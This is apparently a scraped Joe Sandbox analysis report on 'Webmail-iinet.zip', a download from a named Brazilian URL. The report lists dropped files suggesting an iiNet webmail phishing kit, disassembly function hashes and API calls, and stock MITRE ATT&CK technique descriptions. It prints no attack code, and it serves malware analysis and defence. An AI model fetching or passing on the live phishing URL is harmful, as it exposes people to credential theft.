Opcode ID: 7eb2d7574b2e46baf878443410545a316b866080abc7367adcb2771305c950fe
Instruction ID: e6feed9104f75867ccca745c12e2a8befa1e860745b1f381bcbbd5b7b3a10709
Opcode Fuzzy Hash: 7eb2d7574b2e46baf878443410545a316b866080abc7367adcb2771305c950fe
Instruction Fuzzy Hash: D301D1759042408FDB108F19D8857A6FBE4EF05320F0CC0AAED558B766E775E858EAB2

Function 00D4A2DA Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00D4A30C

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: bde6465ba42b2ba7b8f086ac8ef372eba9a88bf92a595a832537c8dddbb3a4fa
Instruction ID: 40d759d70c17106936271dcad9dca09a04bbb939ebb906781a80bd0d378d8898
Opcode Fuzzy Hash: bde6465ba42b2ba7b8f086ac8ef372eba9a88bf92a595a832537c8dddbb3a4fa
Instruction Fuzzy Hash: 1BF08C359082408FDB208F09E889765FBA4EF05720F0CC09ADD494F766E3B5E818DAA2

Function 01400799 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

\O!l, xrefs: 01400966

Memory Dump Source

Source File: 00000006.00000002.1718593918.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1400000_unarchiver.jbxd

Similarity

API ID:
String ID: \O!l
API String ID: 0-331521387
Opcode ID: 3fbc27ff529fa5623a09747fe8ccb484dfcac1742b9eebc461f0651b3b1c947f
Instruction ID: 94bd86594c40009ae715a0b8311b23df816eeb96c4734a833aa068bbb52cb6fc
Opcode Fuzzy Hash: 3fbc27ff529fa5623a09747fe8ccb484dfcac1742b9eebc461f0651b3b1c947f
Instruction Fuzzy Hash: 28A19030B002108BDB09AFB9C4547BE77B7EB84348F148429EA0A977E8DF749D46CB61

Function 00D4A6D4 Relevance: 1.3, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 00D4A748

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: e2b35d91268043c11eac10b4c76473c43327ebca5821dd3cd6141ad15da1a648
Instruction ID: 9f383bf0f15de50d3980e8d078c8dda28f9d68fb2ffe8d869260d26cd11b9926
Opcode Fuzzy Hash: e2b35d91268043c11eac10b4c76473c43327ebca5821dd3cd6141ad15da1a648
Instruction Fuzzy Hash: B521C2755093C05FDB128B25DC95652BFB8AF07220F0D84DADD858F6A3D2645908C762

Function 00D4A716 Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 00D4A748

Memory Dump Source

Source File: 00000006.00000002.1718028981.0000000000D4A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D4A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d4a000_unarchiver.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9fb4dc7410c0dee266d1625dec6819b3f0d4233f5db799a890e8c7151d83cf4e
Instruction ID: a3a1171af063bc4af4b4bf60a4b333d32ec88456ebed363797b133c74c2c2180
Opcode Fuzzy Hash: 9fb4dc7410c0dee266d1625dec6819b3f0d4233f5db799a890e8c7151d83cf4e
Instruction Fuzzy Hash: 9001BC71A042408FDB208F19D885766FBE4DF04320F0CC4AADD898F656D279E818DAA2

Function 014002C0 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1718593918.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1400000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 169e5103b088f4f9eb3497ddaefae2f4f2c796de20f6c2eae6e4623012d11d25
Instruction ID: aab6fec0a5a897cc0046b5ccb2e21f4d55d8a064e5045792e8f121bb4ac92b09
Opcode Fuzzy Hash: 169e5103b088f4f9eb3497ddaefae2f4f2c796de20f6c2eae6e4623012d11d25
Instruction Fuzzy Hash: 6FB12134B01320CFC715EF6AD854B5E77B2EF88391B508625EA0A9B3E8DB319D05CB61

Function 01400BA0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1718593918.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1400000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6baeef6be20daf1edbe9fb5a5f2d3ce24e3beeedba957ddb092ead84b8a88b31
Instruction ID: ed4d4fe733d1f5a4d7bbe08860c765e1b0a3bdcea80907c54d863399eb86cf92
Opcode Fuzzy Hash: 6baeef6be20daf1edbe9fb5a5f2d3ce24e3beeedba957ddb092ead84b8a88b31
Instruction Fuzzy Hash: 4711A335B10118AFCB049BB9D844ADE77F6FF88214B154575E605E7764DB31AC1A8B80

Function 01420807 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1718611464.0000000001420000.00000040.00000020.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1420000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20f911216ac81273eb39438d46764be628267aa46d42375a31866ab94f424ad7
Instruction ID: 36035d47544beaf484e3872bfea61c5d6de64745d461c694c53b3ed42e40cebf
Opcode Fuzzy Hash: 20f911216ac81273eb39438d46764be628267aa46d42375a31866ab94f424ad7
Instruction Fuzzy Hash: 3501D4B280D780AFC301DB11AC44C56BBFCDF86520F08C46EED488B715E236AD188BA2

Function 014205DF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1718611464.0000000001420000.00000040.00000020.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1420000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a13b053f8cfe00bee6344b3d7f7813f05adc307cb9d748428c1b8a1ca2a4fb
Instruction ID: f6c61177c7f1d026538c1e39b3692d8ce1f67d73e44eb835552446d1cde0d963
Opcode Fuzzy Hash: c5a13b053f8cfe00bee6344b3d7f7813f05adc307cb9d748428c1b8a1ca2a4fb
Instruction Fuzzy Hash: 050186B65097845FD7118B16AC44862FFA8DB8662070CC49FEC498B752D625A918CBA2

Function 0142082E Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1718611464.0000000001420000.00000040.00000020.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1420000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7545daaa950303a01b7b445e53d063ab8aee1a19c0cb22e1b71eae7e730680
Instruction ID: eb18e7a8451b57d16afecf6eb39b21c2066f2d0f157db3c97a6deb6d3910f12c
Opcode Fuzzy Hash: 4f7545daaa950303a01b7b445e53d063ab8aee1a19c0cb22e1b71eae7e730680
Instruction Fuzzy Hash: BCF08CB2905604ABD200DF05ED458A6F7ECEF84521F08C52EEC488B701F676A9298AE6

Function 01400C50 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1718593918.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1400000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0adc92f833704a6172420f69f61a7815e6e9bde3c7a351e789b3593b32636e3
Instruction ID: 6e4af12b33ac9adad060d0aa42e4af63a73a2403d6ebc70615cafaa2f2b48c1a
Opcode Fuzzy Hash: a0adc92f833704a6172420f69f61a7815e6e9bde3c7a351e789b3593b32636e3
Instruction Fuzzy Hash: A1E0DFA2F152141BDB04DAFC98102EE7FA1CB81164B94447A8008D7380EA35CD078380

Function 01420606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1718611464.0000000001420000.00000040.00000020.00020000.00000000.sdmp, Offset: 01420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1420000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd02b5d8a018d1dfe61e9d439971b1a6bd1a299f990005f66b3c41db1008bf9
Instruction ID: 6d8bef36259ef041fd8bb3d7fb49481c4464e5c314f1965e1d1a581c17613f52
Opcode Fuzzy Hash: 8fd02b5d8a018d1dfe61e9d439971b1a6bd1a299f990005f66b3c41db1008bf9
Instruction Fuzzy Hash: F4E092B66006408BD650DF0AFC41462F7D8EB84630708C07FDC0D8B711E636B518CAA5

Function 01400C60 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1718593918.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1400000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91f6caf58bc9365f945d1b8f7cf738f41fc4e648bc11df32b7072c8acdad3fd1
Instruction ID: 8cd81d22258ee933e8e22ef0ddf19382cb31e8a8a3d52b478e439ac65f121e0b
Opcode Fuzzy Hash: 91f6caf58bc9365f945d1b8f7cf738f41fc4e648bc11df32b7072c8acdad3fd1
Instruction Fuzzy Hash: 26D02B71F002181B8B04EBF848102DF7BEADBC0054B948079800CD3700EF31CC1283C0

Function 01400DD1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1718593918.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1400000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3136f7285491b68e1e4ebea23f09141cd536401eb4e9003bfbf60ed49ca11217
Instruction ID: 9f5d0496d1cef94abba12be4ab76db596b828c34ff310c42bd5266137e578955
Opcode Fuzzy Hash: 3136f7285491b68e1e4ebea23f09141cd536401eb4e9003bfbf60ed49ca11217
Instruction Fuzzy Hash: B6E0CD741496404FDB0397359864BA53F611B91204F8582AA9108CB7E3D1F5C944C780

Function 00D423F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1717803669.0000000000D42000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D42000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d42000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60d8472d52560b633bd3f5b17a862095f6e67186cd3c4952fcfd4d77cc1604d
Instruction ID: 779a5bf228365701f1d2544240678e3dee7cbcce6129b394f4549c77dcf1f10b
Opcode Fuzzy Hash: d60d8472d52560b633bd3f5b17a862095f6e67186cd3c4952fcfd4d77cc1604d
Instruction Fuzzy Hash: F5D05B752056C14FD3169B1CD159BA537D4AB51714F4A44F9AC048B763C758D981D610

Function 00D423BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1717803669.0000000000D42000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D42000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_d42000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a93ee25a8a3050849ceb71ba2531382f42d1f5e5621d70704357fc1a63d6d7f
Instruction ID: 1bf517237cbb865840552886372cc4226641c4c57894f1901cfa49177eddba6b
Opcode Fuzzy Hash: 2a93ee25a8a3050849ceb71ba2531382f42d1f5e5621d70704357fc1a63d6d7f
Instruction Fuzzy Hash: 07D05E342002C14BC726DE0CD2D8F6937E4AB40714F0A44EDBC108B762C7A9DCC0CA10

Function 01400DE0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1718593918.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1400000_unarchiver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eba6fd93053064da88bb70409936a2e37814b51f29072e4cbedc47f39774b27
Instruction ID: f4056db9dc6e516135e44e51e2fd4bd1dd81f95ddc38da65733a72937c4020d1
Opcode Fuzzy Hash: 8eba6fd93053064da88bb70409936a2e37814b51f29072e4cbedc47f39774b27
Instruction Fuzzy Hash: 8BC012302002048FD705A76AD418F26779657D0254F85C17595084B7E5CA74EC80C6C0

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\css\app-059cd76ea4a5433e14ff6151a432ee48.css

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\css\cb3cc3fa3480964080588c52478ae092-login.png

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\email.php

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\images\iinet-logo.jpg

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\images\tmc-login.png

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\index.html

C:\Users\user\AppData\Local\Temp\nwe5galq.xcu\Webmail-iinet\next.php

C:\Users\user\AppData\Local\Temp\unarchiver.log

C:\Users\user\Desktop\cmdline.out

C:\Users\user\Desktop\download\Webmail-iinet.zip

C:\Users\user\Desktop\extract\Webmail-iinet\css\app-059cd76ea4a5433e14ff6151a432ee48.css

C:\Users\user\Desktop\extract\Webmail-iinet\css\cb3cc3fa3480964080588c52478ae092-login.png

C:\Users\user\Desktop\extract\Webmail-iinet\email.php

C:\Users\user\Desktop\extract\Webmail-iinet\images\iinet-logo.jpg

C:\Users\user\Desktop\extract\Webmail-iinet\images\tmc-login.png

C:\Users\user\Desktop\extract\Webmail-iinet\index.html

C:\Users\user\Desktop\extract\Webmail-iinet\next.php

\Device\ConDrv

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
https://maninhocontabilidade.com.br/pop/Webmail-iinet.zip

Function 01400C99 Relevance: 2.6, Strings: 2, Instructions: 86
COMMON

Function 01400CA8 Relevance: 2.6, Strings: 2, Instructions: 82
COMMON

Function 00D4B246 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Function 00D4AD04 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 00D4AB76 Relevance: 1.6, APIs: 1, Instructions: 94
pipeCOMMON

Function 00D4A5DC Relevance: 1.6, APIs: 1, Instructions: 90
fileCOMMON

Function 00D4A120 Relevance: 1.6, APIs: 1, Instructions: 83
fileCOMMON

Function 00D4B276 Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Function 00D4A370 Relevance: 1.6, APIs: 1, Instructions: 80
registryCOMMON

Function 00D4AD2A Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Function 00D4A850 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON

Function 00D4A933 Relevance: 1.6, APIs: 1, Instructions: 77
fileCOMMON

Function 00D4A5FE Relevance: 1.6, APIs: 1, Instructions: 76
fileCOMMON

Function 00D4A78F Relevance: 1.6, APIs: 1, Instructions: 73
COMMON